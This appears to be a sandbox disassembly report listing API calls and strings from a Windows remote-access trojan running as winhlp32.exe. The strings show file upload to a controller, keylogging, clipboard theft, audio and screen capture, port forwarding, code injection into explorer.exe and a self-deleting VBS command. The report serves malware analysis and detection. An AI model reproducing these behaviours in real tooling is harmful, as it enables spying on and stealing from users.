                                    • GetFileSizeEx.KERNEL32(00000000,?), ref: 00408D1B
                                    • __aulldiv.LIBCMT ref: 00408D4D
                                      • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                      • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                    • SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000), ref: 00408E70
                                    • ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00408E8B
                                    • CloseHandle.KERNEL32(00000000), ref: 00408F64
                                    • CloseHandle.KERNEL32(00000000,00000052), ref: 00408FAE
                                    • CloseHandle.KERNEL32(00000000), ref: 00408FFC
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: File$CloseHandle$CreateLocalPointerReadSizeTime__aulldivsend
                                    • String ID: ReadFile error$SetFilePointerEx error$Uploading file to Controller: $NG
                                    • API String ID: 3086580692-2582957567

                                    APIs
                                    • Sleep.KERNEL32(00001388), ref: 0040A740
                                      • Part of subcall function 0040A675: CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,0040A74D), ref: 0040A6AB
                                      • Part of subcall function 0040A675: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040A74D), ref: 0040A6BA
                                      • Part of subcall function 0040A675: Sleep.KERNEL32(00002710,?,?,?,0040A74D), ref: 0040A6E7
                                      • Part of subcall function 0040A675: CloseHandle.KERNEL32(00000000,?,?,?,0040A74D), ref: 0040A6EE
                                    • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 0040A77C
                                    • GetFileAttributesW.KERNEL32(00000000), ref: 0040A78D
                                    • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 0040A7A4
                                    • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00000012), ref: 0040A81E
                                      • Part of subcall function 0041C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,0040A843), ref: 0041C49E
                                    • SetFileAttributesW.KERNEL32(00000000,00000006,00000013,00466468,?,00000000,00000000,00000000,00000000,00000000), ref: 0040A927
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Similarity
                                    • API ID: File$AttributesCreate$Sleep$CloseDirectoryExistsHandlePathSize
                                    • String ID: 8SG$8SG$pQG$pQG$PG$PG
                                    • API String ID: 3795512280-1152054767

                                    APIs
                                    • ___free_lconv_mon.LIBCMT ref: 0045130A
                                      • Part of subcall function 00450502: _free.LIBCMT ref: 0045051F
                                      • Part of subcall function 00450502: _free.LIBCMT ref: 00450531
                                      • Part of subcall function 00450502: _free.LIBCMT ref: 00450543
                                      • Part of subcall function 00450502: _free.LIBCMT ref: 00450555
                                      • Part of subcall function 00450502: _free.LIBCMT ref: 00450567
                                      • Part of subcall function 00450502: _free.LIBCMT ref: 00450579
                                      • Part of subcall function 00450502: _free.LIBCMT ref: 0045058B
                                      • Part of subcall function 00450502: _free.LIBCMT ref: 0045059D
                                      • Part of subcall function 00450502: _free.LIBCMT ref: 004505AF
                                      • Part of subcall function 00450502: _free.LIBCMT ref: 004505C1
                                      • Part of subcall function 00450502: _free.LIBCMT ref: 004505D3
                                      • Part of subcall function 00450502: _free.LIBCMT ref: 004505E5
                                      • Part of subcall function 00450502: _free.LIBCMT ref: 004505F7
                                    • _free.LIBCMT ref: 004512FF
                                      • Part of subcall function 00446782: RtlFreeHeap.NTDLL(00000000,00000000,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?), ref: 00446798
                                      • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                                    • _free.LIBCMT ref: 00451321
                                    • _free.LIBCMT ref: 00451336
                                    • _free.LIBCMT ref: 00451341
                                    • _free.LIBCMT ref: 00451363
                                    • _free.LIBCMT ref: 00451376
                                    • _free.LIBCMT ref: 00451384
                                    • _free.LIBCMT ref: 0045138F
                                    • _free.LIBCMT ref: 004513C7
                                    • _free.LIBCMT ref: 004513CE
                                    • _free.LIBCMT ref: 004513EB
                                    • _free.LIBCMT ref: 00451403
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Similarity
                                    • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                    • String ID:
                                    • API String ID: 161543041-0

                                    APIs
                                    • __EH_prolog.LIBCMT ref: 00419FB9
                                    • GdiplusStartup.GDIPLUS(00474ACC,?,00000000), ref: 00419FEB
                                    • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0000001A,00000019), ref: 0041A077
                                    • Sleep.KERNEL32(000003E8), ref: 0041A0FD
                                    • GetLocalTime.KERNEL32(?), ref: 0041A105
                                    • Sleep.KERNEL32(00000000,00000018,00000000), ref: 0041A1F4
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Similarity
                                    • API ID: Sleep$CreateDirectoryGdiplusH_prologLocalStartupTime
                                    • String ID: time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i$PG$PG$PG
                                    • API String ID: 489098229-1431523004

                                    APIs
                                      • Part of subcall function 00412850: TerminateProcess.KERNEL32(00000000,pth_unenc,0040F8C8), ref: 00412860
                                      • Part of subcall function 00412850: WaitForSingleObject.KERNEL32(000000FF), ref: 00412873
                                      • Part of subcall function 004136F8: RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,00000000,004752F0), ref: 00413714
                                      • Part of subcall function 004136F8: RegQueryValueExA.KERNELBASE(00000000,00000000,00000000,00000000,00000208,?), ref: 0041372D
                                      • Part of subcall function 004136F8: RegCloseKey.KERNELBASE(00000000), ref: 00413738
                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040D859
                                    • ShellExecuteW.SHELL32(00000000,open,00000000,00466468,00466468,00000000), ref: 0040D9B8
                                    • ExitProcess.KERNEL32 ref: 0040D9C4
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Similarity
                                    • API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
                                    • String ID: """, 0$.vbs$8SG$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$Temp$exepath$open
                                    • API String ID: 1913171305-3159800282

                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Similarity
                                    • API ID: _free
                                    • String ID:
                                    • API String ID: 269201875-0

                                    APIs
                                    • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E38
                                    • SetEvent.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E43
                                    • CloseHandle.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E4C
                                    • closesocket.WS2_32(000000FF), ref: 00404E5A
                                    • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E91
                                    • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00404EA2
                                    • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404EA9
                                    • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404EBA
                                    • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404EBF
                                    • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404EC4
                                    • SetEvent.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404ED1
                                    • CloseHandle.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404ED6
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Similarity
                                    • API ID: CloseEventHandle$ObjectSingleWait$closesocket
                                    • String ID:
                                    • API String ID: 3658366068-0

                                    APIs
                                      • Part of subcall function 004558A9: CreateFileW.KERNEL32(00000000,00000000,?,00455C84,?,?,00000000,?,00455C84,00000000,0000000C), ref: 004558C6
                                    • GetLastError.KERNEL32 ref: 00455CEF
                                    • __dosmaperr.LIBCMT ref: 00455CF6
                                    • GetFileType.KERNEL32(00000000), ref: 00455D02
                                    • GetLastError.KERNEL32 ref: 00455D0C
                                    • __dosmaperr.LIBCMT ref: 00455D15
                                    • CloseHandle.KERNEL32(00000000), ref: 00455D35
                                    • CloseHandle.KERNEL32(?), ref: 00455E7F
                                    • GetLastError.KERNEL32 ref: 00455EB1
                                    • __dosmaperr.LIBCMT ref: 00455EB8
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Similarity
                                    • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                    • String ID: H
                                    • API String ID: 4237864984-2852464175

                                    APIs
                                    • GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,?,0045405C,00000000,00000000,?,00000001,?,?,?,?,00000001), ref: 00453E2F
                                    • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000001,00000000,00000000,?,0045405C,00000000,00000000,?,00000001,?,?,?,?), ref: 00453EB2
                                    • __alloca_probe_16.LIBCMT ref: 00453EEA
                                    • MultiByteToWideChar.KERNEL32(00000001,00000001,?,00000001,00000000,\@E,?,0045405C,00000000,00000000,?,00000001,?,?,?,?), ref: 00453F45
                                    • __alloca_probe_16.LIBCMT ref: 00453F94
                                    • MultiByteToWideChar.KERNEL32(00000001,00000009,00000001,00000000,00000000,00000000,?,0045405C,00000000,00000000,?,00000001,?,?,?,?), ref: 00453F5C
                                      • Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,0043529C,?,?,00438847,?,?,00000000,?,?,0040DE62,0043529C,?,?,?,?), ref: 00446169
                                    • MultiByteToWideChar.KERNEL32(00000001,00000001,00000001,00000000,00000000,?,?,0045405C,00000000,00000000,?,00000001,?,?,?,?), ref: 00453FD8
                                    • __freea.LIBCMT ref: 00454003
                                    • __freea.LIBCMT ref: 0045400F
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Similarity
                                    • API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocateHeapInfo
                                    • String ID: \@E
                                    • API String ID: 201697637-1814623452

                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Similarity
                                    • API ID: _free
                                    • String ID: \&G$\&G$`&G
                                    • API String ID: 269201875-253610517

                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: 65535$udp
                                    • API String ID: 0-1267037602

                                    APIs
                                    • __Init_thread_footer.LIBCMT ref: 0040AD38
                                    • Sleep.KERNEL32(000001F4), ref: 0040AD43
                                    • GetForegroundWindow.USER32 ref: 0040AD49
                                    • GetWindowTextLengthW.USER32(00000000), ref: 0040AD52
                                    • GetWindowTextW.USER32(00000000,00000000,00000000), ref: 0040AD86
                                    • Sleep.KERNEL32(000003E8), ref: 0040AE54
                                      • Part of subcall function 0040A636: SetEvent.KERNEL32(?,?,00000000,0040B20A,00000000), ref: 0040A662
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Similarity
                                    • API ID: Window$SleepText$EventForegroundInit_thread_footerLength
                                    • String ID: [${ User has been idle for $ minutes }$]
                                    • API String ID: 911427763-3954389425

                                    APIs
                                    • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A892
                                    • GetLastError.KERNEL32(?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A89F
                                    • __dosmaperr.LIBCMT ref: 0043A8A6
                                    • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A8D2
                                    • GetLastError.KERNEL32(?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A8DC
                                    • __dosmaperr.LIBCMT ref: 0043A8E3
                                    • WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,?,?,?,?,?,00401D55,?), ref: 0043A926
                                    • GetLastError.KERNEL32(?,?,?,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A930
                                    • __dosmaperr.LIBCMT ref: 0043A937
                                    • _free.LIBCMT ref: 0043A943
                                    • _free.LIBCMT ref: 0043A94A
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Similarity
                                    • API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
                                    • String ID:
                                    • API String ID: 2441525078-0

                                    APIs
                                    • SetEvent.KERNEL32(?,?), ref: 004054BF
                                    • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0040556F
                                    • TranslateMessage.USER32(?), ref: 0040557E
                                    • DispatchMessageA.USER32(?), ref: 00405589
                                    • HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,00474F78), ref: 00405641
                                    • HeapFree.KERNEL32(00000000,00000000,0000003B,0000003B,?,00000000), ref: 00405679
                                      • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Similarity
                                    • API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
                                    • String ID: CloseChat$DisplayMessage$GetMessage
                                    • API String ID: 2956720200-749203953

                                    APIs
                                      • Part of subcall function 00417F2C: __EH_prolog.LIBCMT ref: 00417F31
                                    • WaitForSingleObject.KERNEL32(00000000,000000FF,00000070,004660A4), ref: 00417DDC
                                    • CloseHandle.KERNEL32(00000000), ref: 00417DE5
                                    • DeleteFileA.KERNEL32(00000000), ref: 00417DF4
                                    • ShellExecuteExA.SHELL32(0000003C,00000000,00000010,?,?,?), ref: 00417DA8
                                      • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Similarity
                                    • API ID: CloseDeleteExecuteFileH_prologHandleObjectShellSingleWaitsend
                                    • String ID: 0VG$0VG$<$@$Temp
                                    • API String ID: 1704390241-2575729100

                                    APIs
                                    • OpenClipboard.USER32 ref: 00416941
                                    • EmptyClipboard.USER32 ref: 0041694F
                                    • CloseClipboard.USER32 ref: 00416955
                                    • OpenClipboard.USER32 ref: 0041695C
                                    • GetClipboardData.USER32(0000000D), ref: 0041696C
                                    • GlobalLock.KERNEL32(00000000), ref: 00416975
                                    • GlobalUnlock.KERNEL32(00000000), ref: 0041697E
                                    • CloseClipboard.USER32 ref: 00416984
                                      • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Clipboard$CloseGlobalOpen$DataEmptyLockUnlocksend
                                    • String ID: !D@
                                    • API String ID: 2172192267-604454484
                                    • Opcode ID: 93349cd1f58038fe6e893b2ed0969c7065e068f09567d1adcf92a67e7a90f973
                                    • Instruction ID: 305b70c8a6b081cbeb1fc088e42579eafb4add048c4ccd3ac1cf7446a02d8759
                                    • Opcode Fuzzy Hash: 93349cd1f58038fe6e893b2ed0969c7065e068f09567d1adcf92a67e7a90f973
                                    • Instruction Fuzzy Hash: CC015E31214301DFC714BB72DC09AAE77A5AF88742F40047EF906821E2DF38CC44CA69
                                    Uniqueness Score: -1.00%

                                    APIs
                                    • CreateFileMappingW.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 00413417
                                    • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 00413425
                                    • GetFileSize.KERNEL32(?,00000000), ref: 00413432
                                    • UnmapViewOfFile.KERNEL32(00000000), ref: 00413452
                                    • CloseHandle.KERNEL32(00000000), ref: 0041345F
                                    • CloseHandle.KERNEL32(?), ref: 00413465
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: File$CloseHandleView$CreateMappingSizeUnmap
                                    • String ID:
                                    • API String ID: 297527592-0
                                    • Opcode ID: 7389cf943c6bcf248480826047218ee6b0a919d85f38051736b06d81fd75e68c
                                    • Instruction ID: 9e0538afe5582c7c3c7070a3da709670e2bb39b60280b40541f30be5467d1837
                                    • Opcode Fuzzy Hash: 7389cf943c6bcf248480826047218ee6b0a919d85f38051736b06d81fd75e68c
                                    • Instruction Fuzzy Hash: ED41E631108305BBD7109F25DC4AF6B3BACEF89726F10092AFA14D51A2DF38DA40C66E
                                    Uniqueness Score: -1.00%

                                    APIs
                                    • OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,00000001,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB1C
                                    • OpenServiceW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB33
                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB40
                                    • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB4F
                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB60
                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB63
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Service$CloseHandle$Open$ControlManager
                                    • String ID:
                                    • API String ID: 221034970-0
                                    • Opcode ID: f803f1007c82734b6722f6408504697e53103f3d97c358fc3be63c7478a3d497
                                    • Instruction ID: 6fbe0b082825830d9e24babaefac53afed48758aa8e56b4d18e4903ff4329a9c
                                    • Opcode Fuzzy Hash: f803f1007c82734b6722f6408504697e53103f3d97c358fc3be63c7478a3d497
                                    • Instruction Fuzzy Hash: 41114C71901218AFD711AF64DCC4DFF3B7CDB42B62B000036FA05D2192DB289C46AAFA
                                    Uniqueness Score: -1.00%

                                    APIs
                                    • _free.LIBCMT ref: 00448135
                                      • Part of subcall function 00446782: RtlFreeHeap.NTDLL(00000000,00000000,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?), ref: 00446798
                                      • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                                    • _free.LIBCMT ref: 00448141
                                    • _free.LIBCMT ref: 0044814C
                                    • _free.LIBCMT ref: 00448157
                                    • _free.LIBCMT ref: 00448162
                                    • _free.LIBCMT ref: 0044816D
                                    • _free.LIBCMT ref: 00448178
                                    • _free.LIBCMT ref: 00448183
                                    • _free.LIBCMT ref: 0044818E
                                    • _free.LIBCMT ref: 0044819C
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: _free$ErrorFreeHeapLast
                                    • String ID:
                                    • API String ID: 776569668-0
                                    • Opcode ID: 27d76b13a5ecae076ca6598a5b1433465caaf67949f0bdc0fbde8a5d49186781
                                    • Instruction ID: 63500befab30bf138fa449b3e81d3956d19e40097f86fc95f12732a98ce5ff4f
                                    • Opcode Fuzzy Hash: 27d76b13a5ecae076ca6598a5b1433465caaf67949f0bdc0fbde8a5d49186781
                                    • Instruction Fuzzy Hash: C211B67A500508BFEB01EF96C842CDD3BA5FF05359B0240AAFA588F222DA35DF509BC5
                                    Uniqueness Score: -1.00%

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Eventinet_ntoa
                                    • String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse$NG
                                    • API String ID: 3578746661-3604713145
                                    • Opcode ID: 99e72d212d0662cd44672663293cf7dc5fa51e15c15c5c65b5c40529398bb1cb
                                    • Instruction ID: 71dfdc03858149a45142756d2b421c0b7bbb6d70992310a40494c7f1f0681c69
                                    • Opcode Fuzzy Hash: 99e72d212d0662cd44672663293cf7dc5fa51e15c15c5c65b5c40529398bb1cb
                                    • Instruction Fuzzy Hash: 0051C131A042015BC614FB36C91AAAE37A5AB85344F40453FF906A76F1EF7C8985C7DE
                                    Uniqueness Score: -1.00%

                                    APIs
                                    • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,00456FFF), ref: 00455F27
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: DecodePointer
                                    • String ID: acos$asin$exp$log$log10$pow$sqrt
                                    • API String ID: 3527080286-3064271455
                                    • Opcode ID: 629998c7ca290600fade91f32205cb7004f8bc569fe6c3e827db03ba52e3cc78
                                    • Instruction ID: ff4fc8d1aadbe784407353d8516796ad37925c88dabf63da6293f70e8270e0de
                                    • Opcode Fuzzy Hash: 629998c7ca290600fade91f32205cb7004f8bc569fe6c3e827db03ba52e3cc78
                                    • Instruction Fuzzy Hash: 16519F71900909CBCF10CF58E9485BEBBB0FF49306FA14197D841A73A6DB399D298B1E
                                    Uniqueness Score: -1.00%

                                    APIs
                                    • ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 004174F5
                                      • Part of subcall function 0041C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,0040A843), ref: 0041C49E
                                    • Sleep.KERNEL32(00000064), ref: 00417521
                                    • DeleteFileW.KERNEL32(00000000), ref: 00417555
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: File$CreateDeleteExecuteShellSleep
                                    • String ID: /t $\sysinfo.txt$dxdiag$open$temp
                                    • API String ID: 1462127192-2001430897
                                    • Opcode ID: 48947f3fb1223555cb99bc666b47910aa3d9768f218f81d75253d5c7f5b6b924
                                    • Instruction ID: 51d64fe7c8a5c54eac4555a52c350958ac4104e8f54c8767ba2a87230734c78e
                                    • Opcode Fuzzy Hash: 48947f3fb1223555cb99bc666b47910aa3d9768f218f81d75253d5c7f5b6b924
                                    • Instruction Fuzzy Hash: 1431307194011A9ADB04FB62DC96DED7779AF50309F40017EF606730E2EF785A8ACA9C
                                    Uniqueness Score: -1.00%

                                    APIs
                                    • GetCurrentProcess.KERNEL32(00472B14,00000000,004752D8,00003000,00000004,00000000,00000001), ref: 004073DD
                                    • GetCurrentProcess.KERNEL32(00472B14,00000000,00008000,?,00000000,00000001,00000000,00407656,C:\Windows\winhlp32.exe), ref: 0040749E
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CurrentProcess
                                    • String ID: PEB: %x$[+] NtAllocateVirtualMemory Success$[-] NtAllocateVirtualMemory Error$\explorer.exe$explorer.exe$windir
                                    • API String ID: 2050909247-4242073005
                                    • Opcode ID: 1dcac826a5e52bf6061f4ebfcee704f683c74aacb316ad2bc9bf89965cfe4023
                                    • Instruction ID: f630994b7aed3d2c1b9b8fa2b3e4f68b22e8b08ead4833dea6669ff7d567ef23
                                    • Opcode Fuzzy Hash: 1dcac826a5e52bf6061f4ebfcee704f683c74aacb316ad2bc9bf89965cfe4023
                                    • Instruction Fuzzy Hash: 7031A471A04700ABD321FF65ED46F167BB8AB44305F10087EF515A6292E7B8B8448B6F
                                    Uniqueness Score: -1.00%

                                    APIs
                                    • _strftime.LIBCMT ref: 00401D50
                                      • Part of subcall function 00401A6D: CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AD9
                                    • waveInUnprepareHeader.WINMM(00472A88,00000020,00000000,?), ref: 00401E02
                                    • waveInPrepareHeader.WINMM(00472A88,00000020), ref: 00401E40
                                    • waveInAddBuffer.WINMM(00472A88,00000020), ref: 00401E4F
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: wave$Header$BufferCreateFilePrepareUnprepare_strftime
                                    • String ID: %Y-%m-%d %H.%M$.wav$dMG$|MG
                                    • API String ID: 3809562944-243156785
                                    • Opcode ID: 2a82ab0076c0d6d6c8320c03c1c844241e91b5265a3fceccd43811ae68df0b86
                                    • Instruction ID: 027c37fd5a1300b84eaed5fd93cda356eabc1c7fedb6cd9f381e221a57c36ff8
                                    • Opcode Fuzzy Hash: 2a82ab0076c0d6d6c8320c03c1c844241e91b5265a3fceccd43811ae68df0b86
